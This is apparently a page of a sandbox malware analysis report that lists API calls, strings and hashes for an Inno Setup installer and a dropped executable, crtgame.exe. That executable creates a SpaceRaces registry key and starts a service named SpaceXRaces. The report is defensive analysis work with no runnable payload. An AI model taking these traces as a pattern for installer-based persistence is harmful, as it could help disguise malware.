                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveForeground
                                                                          • String ID: Will not restart Windows automatically.
                                                                          • API String ID: 307657957-4169339592
                                                                          • Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                          • Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
                                                                          • Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                          • Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00424975
                                                                          • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageWait
                                                                          • String ID: +qI
                                                                          • API String ID: 4021538199-4068327824
                                                                          • Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                          • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                          • Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                          • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                          Strings
                                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                          • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                          • API String ID: 0-1974262853
                                                                          • Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                          • Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
                                                                          • Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                          • Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
                                                                          Strings
                                                                          • %s\%s_is1, xrefs: 004779B8
                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                          • API String ID: 47109696-1598650737
                                                                          • Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                          • Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
                                                                          • Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
                                                                          • Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
                                                                          • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ExecuteMessageSendShell
                                                                          • String ID: open
                                                                          • API String ID: 812272486-2758837156
                                                                          • Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                          • Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
                                                                          • Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
                                                                          • Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
                                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,02381A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                          • String ID: )
                                                                          • API String ID: 2227675388-1084416617
                                                                          • Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                          • Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
                                                                          • Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
                                                                          • Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window
                                                                          • String ID: /INITPROCWND=$%x $@
                                                                          • API String ID: 2353593579-4169826103
                                                                          • Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                          • Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
                                                                          • Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
                                                                          • Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98
                                                                          APIs
                                                                            • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                            • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                          • SysFreeString.OLEAUT32(?), ref: 00446D1A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocByteCharFreeMultiWide
                                                                          • String ID: NIL Interface Exception$Unknown Method
                                                                          • API String ID: 3952431833-1023667238
                                                                          • Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                          • Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
                                                                          • Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
                                                                          • Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
                                                                          • CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
                                                                            • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateErrorHandleLastProcess
                                                                          • String ID: D
                                                                          • API String ID: 3798668922-2746444292
                                                                          • Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                          • Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
                                                                          • Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
                                                                          • Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$EnumQuery
                                                                          • String ID: Inno Setup: No Icons
                                                                          • API String ID: 1576479698-2016326496
                                                                          • Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                          • Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
                                                                          • Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
                                                                          • Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
                                                                          APIs
                                                                            • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(6F940000,0047FFE2), ref: 0047BB46
                                                                            • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
                                                                            • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
                                                                          • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
                                                                          • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
                                                                          Strings
                                                                          • Detected restart. Removing temporary directory., xrefs: 004964D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                          • String ID: Detected restart. Removing temporary directory.
                                                                          • API String ID: 1717587489-3199836293
                                                                          • Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                          • Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
                                                                          • Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
                                                                          • Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD
                                                                          APIs
                                                                            • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                          • ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
                                                                          • CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteFileHandleMutexRelease
                                                                          • String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
                                                                          • API String ID: 3841931355-3392794427
                                                                          • Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                          • Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
                                                                          • Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
                                                                          • Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                          APIs
                                                                          • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                          • GetFocus.USER32 ref: 00421D69
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Focus
                                                                          • String ID: +qI
                                                                          • API String ID: 2734777837-4068327824
                                                                          • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                          • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                          • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                          • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                          APIs
                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                          • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Time$FileSystem
                                                                          • String ID: $pI
                                                                          • API String ID: 2086374402-3761944556
                                                                          • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                          • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                          • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                          • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastSleep
                                                                          • String ID:
                                                                          • API String ID: 1458359878-0
                                                                          • Opcode ID: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                          • Instruction ID: 9275ee504a9eb35dba3a5523cc5197587f06a42b27f59d217f7189e04cd8cbf1
                                                                          • Opcode Fuzzy Hash: b3d8df4fac529f1e6ef3b03e70e70f14952c107ad600f92b177c80a496392a1c
                                                                          • Instruction Fuzzy Hash: 1FF024B6B04514678F20E99FD881B2F62CCDAD836E710012BFC04DF343C438EE8986A9

                                                                          Execution Graph

                                                                          Execution Coverage:21.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:13.5%
                                                                          Total number of Nodes:399
                                                                          Total number of Limit Nodes:7

                                                                          Callgraph


                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00402714
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\CRTGame\crtgame.exe,00000104,?,00000000), ref: 0040272B
                                                                          • GetCommandLineW.KERNEL32(?,?,00000000), ref: 00402748
                                                                          • CommandLineToArgvW.SHELL32(00000000,?,00000000), ref: 0040274F
                                                                          • GetLocalTime.KERNEL32(00409F20,?,00000000), ref: 0040275C
                                                                          • lstrcmpiW.KERNELBASE(?,/chk,?,00000000), ref: 0040277E
                                                                          • CreateFileA.KERNEL32(C:\Program Files (x86)\CRTGame\crtgame.exe,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000), ref: 004027CB
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004027D2
                                                                          • ExitProcess.KERNEL32 ref: 004027D9
                                                                          • lstrcmpiW.KERNEL32(?,00407104,?,00000000), ref: 004027FB
                                                                          • RegCreateKeyExA.KERNELBASE(80000002,Software\SpaceRaces,00000000,00000000,00000000,00000006,00000000,?,?,?,00000000), ref: 0040282A
                                                                          • GetTickCount.KERNEL32 ref: 0040284D
                                                                          • wsprintfA.USER32 ref: 00402865
                                                                          • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 00402888
                                                                          • RegCloseKey.KERNELBASE(?), ref: 00402891
                                                                          • StartServiceCtrlDispatcherA.ADVAPI32(?,?,00000000), ref: 0040294C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCommandCreateFileHandleLineModulelstrcmpi$ArgvCountCtrlDispatcherExitLocalNameProcessServiceStartTickTimeValuewsprintf
                                                                          • String ID: /chk$C:\Program Files (x86)\CRTGame\crtgame.exe$Software\SpaceRaces$SpaceXRaces$SpaceXRaces$test$tsr1209%d
                                                                          • API String ID: 99468869-3986529438
